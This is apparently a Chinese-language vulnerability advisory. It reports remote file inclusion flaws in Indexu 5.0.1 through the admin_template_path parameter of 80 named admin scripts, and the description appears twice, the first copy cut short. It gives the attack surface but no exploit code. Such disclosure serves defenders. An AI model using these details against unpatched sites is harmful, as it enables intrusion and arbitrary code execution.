Indexu 5.0.1版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对以下的admin/ 脚本的admin_template_path参数中的一个URL,执行任意PHP代码,其包括: (1)app_change_email.php,(2)app_change_pwd.php,(3)app_mod_rewrite.php,(4)app_page_caching.php,(5)app_setup.php,(6)cat_add.php,(7)cat_delete.php,(8)cat_edit.php,(9)cat_path_update.php,(10)cat_search.php,(11)cat_struc.php,(12)cat_view.php,(13)cat_view_hidden.php,(14)cat_view_hierarchy.php,(15)cat_view_registered_only.php,(16)checkurl_web.php,(17)db_alter.php,(18)db_alter_change.php,(19)db_backup.php,(20)db_export.php,(21)db_import.php,(22)editor_add.php,(23)editor_delete.php,(24)editor_validate.php,(25) head.php,(26)index.php,(27)inv_config.php,(28)inv_config_payment.php, (29)inv_create.php,(30)inv_delete.php,(31)inv_edit.php,(32)inv_markpaid.php,(33)inv_markunpaid.php, (34) inv_overdue.php, (35) inv_paid.php, (36) inv_send.php, (37) inv_unpaid.php, (38) lang_modify.php, (39) link_add.php, (40) link_bad.php, (41) link_bad_delete.php, (42) link_checkurl.php, (43) link_delete.php, (44)...
Indexu 5.0.1版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对以下的admin/ 脚本的admin_template_path参数中的一个URL,执行任意PHP代码,其包括: (1)app_change_email.php,(2)app_change_pwd.php,(3)app_mod_rewrite.php,(4)app_page_caching.php,(5)app_setup.php,(6)cat_add.php,(7)cat_delete.php,(8)cat_edit.php,(9)cat_path_update.php,(10)cat_search.php,(11)cat_struc.php,(12)cat_view.php,(13)cat_view_hidden.php,(14)cat_view_hierarchy.php,(15)cat_view_registered_only.php,(16)checkurl_web.php,(17)db_alter.php,(18)db_alter_change.php,(19)db_backup.php,(20)db_export.php,(21)db_import.php,(22)editor_add.php,(23)editor_delete.php,(24)editor_validate.php,(25) head.php,(26)index.php,(27)inv_config.php,(28)inv_config_payment.php, (29)inv_create.php,(30)inv_delete.php,(31)inv_edit.php,(32)inv_markpaid.php,(33)inv_markunpaid.php, (34) inv_overdue.php, (35) inv_paid.php, (36) inv_send.php, (37) inv_unpaid.php, (38) lang_modify.php, (39) link_add.php, (40) link_bad.php, (41) link_bad_delete.php, (42) link_checkurl.php, (43) link_delete.php, (44) link_duplicate.php, (45) link_edit.php, (46) link_premium_listing.php, (47) link_premium_sponsored.php, (48) link_search.php, (49) link_sponsored_listing.php, (50) link_validate.php, (51) link_validate_edit.php, (52) link_view.php, (53) log_search.php, (54) mail_modify.php, (55) menu.php, (56) message_create.php, (57) message_delete.php, (58) message_edit.php, (59) message_send.php, (60) message_subscriber.php, (61) message_view.php, (62) review_validate.php, (63) review_validate_edit.php, (64) summary.php, (65) template_active.php, (66) template_add_custom.php, (67) template_delete.php, (68) template_delete_file.php, (69) template_duplicate.php, (70) template_export.php, (71) template_import.php, (72) template_manager.php, (73) template_modify.php, (74) template_modify_file.php, (75) template_rename.php, (76) user_add.php, (77) user_delete.php, (78) user_edit.php, (79) user_search.php, and (80) whos.php.
